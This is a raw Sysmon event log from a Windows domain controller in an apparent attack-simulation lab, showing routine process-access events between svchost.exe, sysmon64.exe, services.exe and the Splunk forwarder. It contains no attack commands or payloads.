15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.284{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.221{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.221{D28789B6-7C62-5FA1-0A00-000000008801}8522688C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.710{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.191{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM